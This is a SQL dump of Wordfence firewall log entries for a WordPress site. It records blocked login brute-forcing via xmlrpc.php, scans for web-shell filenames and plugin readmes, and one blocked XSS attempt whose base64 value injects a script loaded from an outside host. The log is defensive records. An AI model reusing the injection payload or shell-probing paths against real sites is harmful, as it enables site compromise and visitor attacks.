(50341, 0.000000, 1711095494.233034, '\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50342, 0.000000, 1711095500.962194, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50343, 0.000000, 1711095501.838875, '\0\0\0\0\0\0\0\0\0\0ÿÿÄØ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50344, 1711095503.810100, 1711095503.533000, '\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50345, 0.000000, 1711095507.439484, '\0\0\0\0\0\0\0\0\0\0ÿÿ/óþT', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50346, 0.000000, 1711095511.007888, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50347, 0.000000, 1711095518.171708, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0', 'loginFailInvalidUsername', NULL, NULL),
(50348, 0.000000, 1711095518.448593, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ON)', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50349, 0.000000, 1711095524.269282, '\0\0\0\0\0\0\0\0\0\0ÿÿ°X)Ï', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50956, 1712207722.180302, 1712207721.749200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50959, 1712207688.133230, 1712207687.746600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50958, 1712207700.977170, 1712207700.559900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(51890, 1712582130.646475, 1712582129.971300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/old/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50915, 1712082541.806726, 1712082541.051300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(50916, 1712082535.662865, 1712082534.812600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(50968, 1712207531.335041, 1712207530.899800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(51882, 1712582158.998027, 1712582158.484500, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/oldsite/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50808, 1712000138.292817, 1712000137.618700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50704, 1711810298.980571, 1711810298.588700, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/universal-news/www.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3VuaXZlcnNhbC1uZXdzL3d3dy5waHA=","category":"brute-force","ssl":1}'),
(50647, 1711731916.532856, 1711731916.170000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///alfanew2.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWxmYW5ldzIucGhwNw==","category":"brute-force","ssl":1}'),
(50614, 1711731976.284453, 1711731975.907400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/maro.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy9tYXJvLnBocA==","category":"brute-force","ssl":1}'),
(51760, 1712371706.082247, 1712371705.738000, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/st.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0LnBocA==","category":"brute-force","ssl":1}'),
(51719, 1712368115.055642, 1712368114.664600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/quiz-master-next/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2; rv:58.0.1) Gecko/20100101 Firefox/58.0.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9xdWl6LW1hc3Rlci1uZXh0L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9xdWl6LW1hc3Rlci1uZXh0L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51718, 1712368116.404294, 1712368116.050400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-simple-cart/readme.txt', NULL, 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070309 Firefox/52.0.2', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zaW1wbGUtY2FydC9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zaW1wbGUtY2FydC9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51840, 1712425992.891055, 1712425992.602100, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/old/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51784, 1712381055.648688, 1712381055.345800, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51752, 1712368254.858484, 1712368254.529900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-property/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/82.0 Mobile/16H20 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wcm9wZXJ0eS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wcm9wZXJ0eS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51756, 0.000000, 1712371581.575630, '\0\0\0\0\0\0\0\0\0\0ÿÿT6FØ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51757, 0.000000, 1712371583.448359, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51758, 1712371709.836054, 1712371709.502600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51793, 0.000000, 1712387037.448851, '\0\0\0\0\0\0\0\0\0\0ÿÿ·R¡', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51785, 1712381053.509324, 1712381052.959200, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(51759, 1712371708.344980, 1712371707.969600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/css/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(51794, 0.000000, 1712388502.968934, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51795, 1712389401.602636, 1712389401.251200, '\0\0\0\0\0\0\0\0\0\0ÿÿNGÜ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(51797, 0.000000, 1712392779.730377, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/› ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51798, 0.000000, 1712393320.631471, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51799, 0.000000, 1712395759.739329, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51800, 0.000000, 1712396925.430203, '\0\0\0\0\0\0\0\0\0\0ÿÿËÂ`Û', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51796, 0.000000, 1712390887.155377, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51801, 0.000000, 1712398160.636984, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51802, 0.000000, 1712398931.477499, '\0\0\0\0\0\0\0\0\0\0ÿÿuÃ¼í', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51803, 0.000000, 1712400559.578643, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51804, 1712402785.872919, 1712402785.163000, '\0\0\0\0\0\0\0\0\0\0ÿÿYø®	', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-json/litespeed/v1/cdn_status', NULL, 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.3', 'blocked:waf', 'XSS: Cross Site Scripting', '{"learningMode":0,"failedRules":"9","paramKey":"cmVxdWVzdC5ib2R5W3Jlc3VsdF1bX21zZ10=","paramValue":"PHNjcmlwdCBzcmM9aHR0cHM6Ly9jZG4ubWVkaWFqc2RlbGl2ZXJ5LmNvbT48L3NjcmlwdD4=","path":"L3dwLWpzb24vbGl0ZXNwZWVkL3YxL2Nkbl9zdGF0dXM=","category":"xss","ssl":1}'),
(51805, 1712402806.849353, 1712402806.549900, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L2NvbXBvbmVudHMvY29tX2FjeW1haWxpbmcvaW5jL29wZW5mbGFzaC9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=","category":"brute-force","ssl":1}'),
